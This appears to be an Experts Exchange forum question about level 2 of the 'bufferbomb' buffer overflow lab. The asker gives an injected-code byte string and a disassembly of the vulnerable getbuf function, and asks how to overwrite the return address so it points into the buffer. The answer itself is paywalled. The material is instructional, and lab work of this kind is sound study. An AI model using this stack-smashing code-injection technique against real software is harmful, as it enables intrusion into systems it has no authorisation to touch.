troubleshooting Question

bufferbomb level2

Avatar of snowball86
snowball86 asked on
Assembly
7 Comments1 Solution356 ViewsLast Modified:
I have code for my exploit string which is

c7 05 c0 a1 04 08 74 28 5e 70 68 c0 8d 04 08 c3

My problem is that i can't figure out how to put it into the buffer and get this particular code to be called.

Am i supposed to do something like this?

c7 05 c0 a1 04 08 74 28 5e 70 68 c0 8d 04 08 c3 xx xx xx xx

where the x's are the are the begining address of the buffer? The buffer size is 16 so  should i overwrite the return address so that it points back to the begining of buffer?

Dump of assembler code for function getbuf:
0x08048f40 <getbuf+0>:  push   %ebp
0x08048f41 <getbuf+1>:  mov    %esp,%ebp
0x08048f43 <getbuf+3>:  sub    $0x18,%esp
0x08048f46 <getbuf+6>:  lea    0xfffffff4(%ebp),%eax
0x08048f49 <getbuf+9>:  mov    %eax,(%esp)
0x08048f4c <getbuf+12>: call   0x8048dd0 <Gets>
0x08048f51 <getbuf+17>: mov    $0x1,%eax
0x08048f56 <getbuf+22>: leave  
0x08048f57 <getbuf+23>: ret    
0x08048f58 <getbuf+24>: nop    
0x08048f59 <getbuf+25>: lea    0x0(%esi),%esi

I don't know how to find the beginign address of the buffer though. i am also not sure if i just put the exploit code into the buffer and then overwrite the return address with the begining address of the buffer.
ASKER CERTIFIED SOLUTION
Join our community to see this answer!
Unlock 1 Answer and 7 Comments.
Start Free Trial
Learn from the best

Network and collaborate with thousands of CTOs, CISOs, and IT Pros rooting for you and your success.

Andrew Hancock - VMware vExpert
See if this solution works for you by signing up for a 7 day free trial.
Unlock 1 Answer and 7 Comments.
Try for 7 days

”The time we save is the biggest benefit of E-E to our team. What could take multiple guys 2 hours or more each to find is accessed in around 15 minutes on Experts Exchange.

-Mike Kapnisakis, Warner Bros